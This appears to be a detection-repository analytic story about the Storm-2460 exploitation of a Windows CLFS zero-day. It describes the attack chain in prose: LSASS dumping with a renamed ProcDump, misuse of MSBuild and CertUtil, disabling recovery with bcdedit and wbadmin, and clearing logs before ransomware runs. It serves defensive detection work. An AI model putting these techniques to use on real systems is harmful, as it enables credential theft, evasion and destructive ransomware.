Analytics Story: Storm-2460 CLFS Zero Day Exploitation
Description
This analytic story focuses on the exploitation of a Common Log File System (CLFS) driver vulnerability by the Storm-2460 threat actor. The attack chain involves initial access through a zero-day vulnerability in the Windows CLFS driver, followed by the deployment of PipeMagic malware. The threat actor then leverages various living-off-the-land techniques, including the abuse of MSBuild, CertUtil, and ProcDump, to maintain persistence and exfiltrate data. The attack culminates in ransomware deployment, with the actor taking steps to disable system recovery and clear logs to hinder incident response.
Why it matters
Storm-2460, a sophisticated threat actor, has been observed exploiting a zero-day vulnerability in the Windows Common Log File System (CLFS) driver. The attack begins with the exploitation of the CLFS driver vulnerability, which allows the threat actor to gain initial access to the target system. Following successful exploitation, the actor deploys PipeMagic malware, a custom tool designed to facilitate further system access and control.
Once established on the system, Storm-2460 employs various living-off-the-land techniques to maintain persistence and evade detection. The threat actor frequently uses MSBuild.exe, often renamed or spawned by script processes, to execute malicious code. They also leverage CertUtil.exe for various purposes, including downloading additional payloads and extracting certificates. In their credential theft operations, they utilize ProcDump renamed as dllhost.exe to dump LSASS memory. To cover their tracks, they disable system recovery options through bcdedit and wbadmin commands, while using wevtutil to clear event logs and remove evidence of their activities.
The attack chain demonstrates a high level of sophistication, with the threat actor carefully selecting legitimate Windows tools and utilities to carry out their objectives while minimizing the risk of detection. The use of renamed tools and script-based execution methods helps them blend in with normal system activity, making detection more challenging for security teams.
The final stage of the attack involves the deployment of ransomware, with the threat actor taking specific steps to ensure their encryption activities cannot be easily reversed. They systematically disable Windows recovery options and delete system backups and shadow copies to prevent system restoration. To further hinder incident response and forensic investigation, they clear logs and use legitimate tools in ways that appear normal to security systems. This comprehensive approach to persistence and anti-forensics makes the attack particularly challenging to detect and remediate.
This analytic story provides comprehensive detection coverage for the various stages of the Storm-2460 attack chain, from initial exploitation through ransomware deployment. The included detections focus on identifying the abuse of legitimate tools and unusual system modifications that may indicate the presence of this threat actor. By monitoring for these specific behaviors and tool abuses, security teams can better detect and respond to this sophisticated threat.
Detections
Data Sources
| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor |
crowdstrike |
| Sysmon EventID 1 |  Windows |
xmlwineventlog |
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon EventID 3 | Windows |
xmlwineventlog |
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Windows Event Log Security 4688 | Windows |
xmlwineventlog |
XmlWinEventLog:Security |
References
Source: GitHub | Version: 1